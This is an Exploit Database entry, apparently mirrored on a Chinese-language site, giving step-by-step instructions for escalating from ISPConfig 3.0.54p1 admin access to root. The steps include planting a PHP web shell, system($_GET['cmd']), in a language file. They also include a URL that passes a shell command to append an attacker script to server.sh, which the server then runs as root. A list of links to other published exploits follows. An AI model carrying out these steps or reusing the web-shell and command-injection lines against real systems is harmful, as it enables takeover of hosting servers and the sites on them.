ISPConfig 3.0.54p1 – (Authenticated) Admin Privilege Escalation

Exploit Database
79 阅读

作者： mra

日期： 2014-08-02
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/34241/

# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
# Date: 7/25/14
# Exploit Author: mra
# Vendor Homepage: http://wwwispconfig.org
# Version: 3.0.54p1
# Tested on: ubuntu, centos
# irc.criten.net #elite-chat


While logged in as admin user:


1) add a shell user

2) under option set gid to ispconfig

3) log in as that user

4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);


5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh


6) create /tmp/script and put a command you wish to be executed as root.

last Exploits
ISPConfig 3.0.54p1 – (Authenticated) Admin Privilege Escalation的更多信息

IPFire 2.25 – Remote Code Execution (Authenticated)：
Atlassian Jira Service Desk 4.9.1 – Unrestricted File Upload to XSS：
phpLDAPadmin 1.2.2 – ‘base’ Cross-Site Scripting：
WordPress Plugin Simple:Press Forum – Arbitrary File Upload：
iauto mobile Application 2012 – Multiple Vulnerabilities：
DVD Rental Software – SQL Injection：
Iris ID IrisAccess ICU 7000-2 – Multiple Vulnerabilities：
WordPress Plugin Rating-Widget 1.3.1 – Multiple Cross-Site Scripting Vulnerabilities：